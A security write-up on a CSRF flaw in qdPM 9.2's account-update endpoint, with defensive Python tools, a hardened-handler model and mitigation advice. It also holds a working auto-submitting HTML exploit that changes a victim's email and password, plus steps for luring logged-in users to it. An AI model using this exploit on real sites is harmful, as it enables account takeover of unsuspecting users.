qdPM 9.2 is vulnerable to Cross-Site Request Forgery (CSRF) through the “index.php/myAccount/update” URI. The endpoint accepts state-changing POST requests on the strength of the victim's session cookie alone, so an attacker who lures an authenticated user onto a page they control can change that user's account settings and perform other unauthorized operations on their behalf.
Every change to a user account, including the password, e-mail address and personal details, goes through the “index.php/myAccount/update” endpoint. That endpoint is not properly protected against CSRF: it does not require an unpredictable, session-bound token or otherwise verify that the request came from the application's own form, so it can be driven from any site the victim visits.
To exploit the issue, an attacker hosts a web page (or sends an HTML e-mail) containing a form whose action is the “index.php/myAccount/update” URI and whose hidden fields carry the values the attacker wants written into the victim's account.
The victim has to open that page, or follow the forged link, while logged in to qdPM. The form submits itself on load, the browser attaches the victim's qdPM session cookie to the cross-site request, and the application applies the changes. Since the password and e-mail address are among the editable fields, a single forged request is enough to lock the victim out of their own account.
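Before building a PoC, a tester first confirms that the genuine account form carries no anti-CSRF token and that the session cookie is not restricted by SameSite. The following Python script is an added example, not part of the original write-up or of qdPM: it parses a settings page, lists the fields the form submits, flags hidden inputs that look like tokens, and reads the SameSite attribute off a Set-Cookie header. The two HTML snippets and the cookie header inside it are constructed for illustration and are not qdPM's real markup.

```python
"""Inspect an account-update form for CSRF defenses (added example, not qdPM code).

The sample HTML and cookie header below are constructed for illustration.
"""
from html.parser import HTMLParser
import math
import re
from typing import Dict, List, Optional

TOKEN_NAME_RE = re.compile(r"(csrf|xsrf|token|nonce|authenticity)", re.I)


def _shannon_entropy(s: str) -> float:
    """Bits per character; random hex/base64 tokens score well above 3."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


class _FormParser(HTMLParser):
    """Collects each <form> with its action, method and <input> fields."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._current: Optional[Dict] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").upper(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": a.get("type") or "text",
                                            "name": a.get("name") or "",
                                            "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_csrf_tokens(form: Dict) -> List[str]:
    """Hidden inputs that look like anti-CSRF tokens, by name or by a long
    high-entropy value (catches tokens with non-obvious names)."""
    hits = []
    for inp in form["inputs"]:
        if inp["type"] != "hidden":
            continue
        if TOKEN_NAME_RE.search(inp["name"]):
            hits.append(inp["name"])
        elif len(inp["value"]) >= 16 and _shannon_entropy(inp["value"]) > 3.5:
            hits.append(inp["name"])
    return hits


def assess_form(html: str, action_hint: str) -> Dict:
    """Locate the form posting to *action_hint* and report its CSRF posture."""
    p = _FormParser()
    p.feed(html)
    for form in p.forms:
        if action_hint in form["action"]:
            tokens = find_csrf_tokens(form)
            return {"action": form["action"], "method": form["method"],
                    "fields": [i["name"] for i in form["inputs"] if i["name"]],
                    "tokens": tokens,
                    "csrf_protected": bool(tokens)}
    raise ValueError(f"no form posting to {action_hint!r}")


def samesite_of(set_cookie: str) -> Optional[str]:
    """SameSite value of a Set-Cookie header, or None if absent. A session
    cookie without SameSite=Lax/Strict rides along on cross-site POSTs,
    which is exactly what a forged auto-submitting form relies on."""
    m = re.search(r";\s*SameSite=(\w+)", set_cookie, re.I)
    return m.group(1).capitalize() if m else None


# Constructed sample pages (not real qdPM output). The first mirrors the
# field names used by the PoC; the second adds a synchronizer token.
UNPROTECTED_PAGE = """
<form action="/index.php/myAccount/update" method="post">
  <input type="text" name="email" value="user@example.com">
  <input type="password" name="password" value="">
  <input type="submit" value="Save">
</form>"""

PROTECTED_PAGE = """
<form action="/index.php/myAccount/update" method="post">
  <input type="hidden" name="_csrf_token" value="b7f1c9e2d4a6f8039c5e1b2d7a4f6c8e">
  <input type="text" name="email" value="user@example.com">
  <input type="password" name="password" value="">
  <input type="submit" value="Save">
</form>"""

if __name__ == "__main__":
    for page in (UNPROTECTED_PAGE, PROTECTED_PAGE):
        print(assess_form(page, "myAccount/update"))
    print(samesite_of("PHPSESSID=abc123; Path=/; HttpOnly"))  # constructed header
```

Feed assess_form the HTML of the logged-in settings page (saved from the browser or an intercepting proxy). A POST form whose tokens list is empty, combined with a session cookie whose samesite_of result is None, is the condition the PoC below exploits.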
<html>
<body>
<h1>CSRF PoC - qdPM 9.2</h1>
<!-- The form targets the vulnerable endpoint; the victim's browser attaches
     the qdPM session cookie to this cross-site POST automatically. -->
<form action="https://target.qdpm.com/index.php/myAccount/update" method="POST" id="csrfForm">
<!-- Field names must match the ones the genuine account form submits.
     attacker@example.com is a placeholder for an attacker-controlled address. -->
<input type="hidden" name="email" value="attacker@example.com" />
<input type="hidden" name="password" value="newpassword123" />
<!-- Additional fields can be added here to modify other account settings -->
</form>
<script>
// Submit as soon as the page loads; the victim does not need to click anything.
document.getElementById('csrfForm').submit();
</script>
</body>
</html>
5. Replace “https://target.qdpm.com” with the base URL of the qdPM instance you are testing.
6. Set the hidden input fields to the values you want written to the victim's account (e.g. email, password); the field names must match those of the real account form. Save the page as “csrf_poc.html”.
7. Host the file on a web server or transfer it to a location accessible by the target user.
8. Craft a convincing message or webpage enticing the authenticated user to visit the URL hosting the “csrf_poc.html” file.
9. When the user opens the page while logged in, the form submits automatically and the browser sends the forged POST, together with the user's session cookie, to the “index.php/myAccount/update” URI, modifying the account details without the user's knowledge. The attack only succeeds if the victim has an active qdPM session at the moment the page loads.
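To see why the procedure works and what closes the hole, the following Python model (an added example, not qdPM's code) runs the PoC's request against a handler that trusts the session cookie alone and against one that checks a session-bound synchronizer token, the Origin header, and the current password before changing credentials. Requests are plain dicts standing in for parsed HTTP requests; APP_ORIGIN, the field names _csrf_token and current_password, and the sample values are assumptions made for the illustration.

```python
"""Vulnerable vs. hardened handling of a POST to myAccount/update.

Added example modelling the server side generically; it is not qdPM's code.
Field names, origin and sample values are assumptions for the illustration.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict

APP_ORIGIN = "https://target.qdpm.com"  # assumed deployment origin


@dataclass
class Session:
    user_id: int
    email: str
    password: str
    # Per-session synchronizer token; the genuine form embeds it as a hidden field.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    form: Dict[str, str]
    headers: Dict[str, str] = field(default_factory=dict)


def update_account_vulnerable(req: Request, session: Session) -> bool:
    """Applies every submitted field, trusting the session cookie alone.

    Any page the victim visits can POST here with an auto-submitting form,
    because the browser attaches the session cookie without asking.
    """
    if req.method != "POST":
        return False
    if "email" in req.form:
        session.email = req.form["email"]
    if "password" in req.form:
        session.password = req.form["password"]
    return True


def update_account_hardened(req: Request, session: Session) -> bool:
    """Same update with three independent checks a forged form cannot satisfy:
    1. the hidden _csrf_token must equal the session token (constant-time compare);
    2. an Origin header, if the browser sent one, must be our own origin;
    3. a password change must carry the current password."""
    if req.method != "POST":
        return False
    if not hmac.compare_digest(req.form.get("_csrf_token", ""), session.csrf_token):
        return False
    origin = req.headers.get("Origin")
    if origin is not None and origin != APP_ORIGIN:
        return False
    if "password" in req.form:
        if req.form.get("current_password") != session.password:
            return False
        session.password = req.form["password"]
    if "email" in req.form:
        session.email = req.form["email"]
    # Rotate the token after a successful state change so it is single-use.
    session.csrf_token = secrets.token_urlsafe(32)
    return True


def forged_request() -> Request:
    """What the PoC page submits: attacker-chosen fields, attacker's Origin,
    and no token, since the attacker's page cannot read the victim's form."""
    return Request("POST",
                   {"email": "attacker@example.com", "password": "newpassword123"},
                   {"Origin": "https://evil.example"})


def legitimate_request(session: Session) -> Request:
    """A submission from the real settings page, carrying the session token."""
    return Request("POST",
                   {"email": "user@example.com", "password": "N3w!Passw0rd",
                    "current_password": session.password,
                    "_csrf_token": session.csrf_token},
                   {"Origin": APP_ORIGIN})


def demo() -> Dict[str, bool]:
    """Run the forged request against both handlers and a legitimate request
    against the hardened one; report which attempts changed the account."""
    s1 = Session(1, "user@example.com", "Old!Passw0rd")
    s2 = Session(1, "user@example.com", "Old!Passw0rd")
    s3 = Session(1, "user@example.com", "Old!Passw0rd")
    return {
        "forged_vs_vulnerable": update_account_vulnerable(forged_request(), s1),
        "forged_vs_hardened": update_account_hardened(forged_request(), s2),
        "legit_vs_hardened": update_account_hardened(legitimate_request(s3), s3),
    }


if __name__ == "__main__":
    print(demo())
```

The token check alone defeats the PoC as written; the Origin check and the current-password requirement are defence in depth, so that a leaked or predictable token still cannot be turned into a credential change. Setting the session cookie with SameSite=Lax or Strict is a further browser-side layer that keeps the cookie off the forged cross-site POST in the first place.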